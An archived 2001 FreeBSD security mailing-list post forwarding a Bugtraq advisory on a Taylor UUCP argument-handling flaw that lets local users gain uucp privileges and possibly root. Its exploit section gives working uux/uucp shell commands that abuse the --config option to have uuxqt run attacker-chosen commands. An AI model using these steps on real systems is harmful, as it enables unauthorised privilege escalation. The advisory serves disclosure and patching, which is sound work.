Skip site navigation (1)Skip section navigation (2)
Date:      Sat, 08 Sep 2001 15:34:48 -0400
From:      Mike Tancsa <mike@sentex.net>
To:        security@freebsd.org
Subject:   Fwd: Multiple vendor 'Taylor UUCP' problems.
Message-ID:  <5.1.0.14.0.20010908153417.0286b4b8@192.168.0.12>

next in thread | raw e-mail | index | archive | help

I imagine FreeBSD is vulnerable to this was well :-(

         ---Mike


>Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
>List-Id: <bugtraq.list-id.securityfocus.com>
>List-Post: <mailto:bugtraq@securityfocus.com>
>List-Help: <mailto:bugtraq-help@securityfocus.com>
>List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
>List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
>Delivered-To: mailing list bugtraq@securityfocus.com
>Delivered-To: moderator for bugtraq@securityfocus.com
>Date: Sat, 8 Sep 2001 22:58:39 +1200 (NZST)
>From: zen-parse <zen-parse@gmx.net>
>X-X-Sender:  <zen-parse@clarity.local>
>To: <bugtraq@securityfocus.com>
>Subject: Multiple vendor 'Taylor UUCP' problems.
>
>******************* Brief description *************
>
>   Due to incorrect argument handling in a component of the
>   Taylor UUCP package, it is possible for local users to
>   gain uid/gid uucp.
>
>   This may allow further elevation, depending on the system,
>   up to and including root access.
>
>   On OpenBSD 2.8 (and probably others) it allows root compromise.
>   By overwriting the uucp owned program /usr/bin/uustat, arbitrary
>   commands may be executed as part of the /etc/daily crontab script.
>
>   On Redhat 7.0 (and probably others) it allows creation of empty
>   files as root, and the ability to execute commands as if logged
>   in at the console (as checked via /lib/security/pam_console.so).
>   This may also allow further elevation of privileges, or denial of
>   service. (Tested against uucp-1.06.1-25)
>
>   Other systems running this package are also affected to
>   a greater or lesser degree.
>
>*********************** Solution ******************
>
>Patches should be available very soon, if not already, for most
>affected systems.
>
>If you do not require uucp functionality, you should remove the
>uucp packages from your system.
>
>********************** The Programs ***************
>
>uux                  (1)  - Remote command execution over UUCP
>   If you specify an alternative configuration, it will run as the user
>   that called it, and pass the same configuration to uuxqt.
>
>uuxqt                (1)  - UUCP execution daemon
>   Defaults to allowing rmail and uucp to be run, and nothing else,
>   unless the configuration it is invoked with allows it to run other
>   commands.
>
>uucp                 (1)  - Unix to Unix copy
>   If you specify an alternate configuration, it will also run as the user
>   that called it.
>
>   uuxqt checks the arguments for the programs it is asked to execute
>   and gets rid of what it thinks are the potentially dangerous ones.
>   However, it does not remove long arguments.
>
>******************** The Exploit ******************
>
>uux 'uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile'
>
>will execute uucp, but will not use the /tmp/vv.v configuration file.
>
>However,
>
>uux 'uucp --config=/tmp/vv.v /tmp/somefile /tmp/someotherfile'
>
>will use the supplied configuration, without dropping privileges.
>
>1) Make a configuration file that allows any command to be executed, and
>    allows files from anywhere to be copied to anywhere that is writable
>    by uid/gid uucp. ( /tmp/config.uucp )
>2) Make a command file with the command you want to be executed.
>    ( /tmp/commands.uucp )
>3) Do something like the following:
>
>$ THISHOST=`uuname -l`
>$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/X./X.${THISHOST}X1337
>$ uux 'uucp --config=/tmp/config.uucp /tmp/commands.uucp '${WHEREYOUWANTIT}
>
>The commands in /tmp/commands.uucp file will be executed by uuxqt, with
>the uid/gid of uucp.
>
>If you want to perform an exploit, and don't know what to put in the
>files, you should read the documentation for uucp.
>
>(Proof of concept root exploit for OpenBSD was performed on the wargame
>running OpenBSD 2.8 at damageinc.tv [ http://damageinc.tv ] )
>
>-- zen-parse
>
>===========================================================================
>     http://mp3.com/cosv = Because %49%74%27%73%20%67%6f%6f%64%2e
>      'gone platinum'    = Buy the CD that %74%6f%6f%6b%20%61%67%65%73
>                         = and %73%6f%75%6e%64%73%20%6f%6b
>===========================================================================
>
>-------------------------------------------------------------------------
>The preceding information is confidential and may not be redistributed
>without explicit permission. Legal action may be taken to enforce this.
>If this message was posted by zen-parse@gmx.net to a public forum it may
>be redistributed as long as these conditions remain attached. If you are
>mum or dad, this probably doesn't apply to you.

--------------------------------------------------------------------
Mike Tancsa,                                      tel +1 519 651 3400
Sentex Communications,                            mike@sentex.net
Providing Internet since 1994                    www.sentex.net
Cambridge, Ontario Canada                         www.sentex.net/mike


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message




Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?5.1.0.14.0.20010908153417.0286b4b8>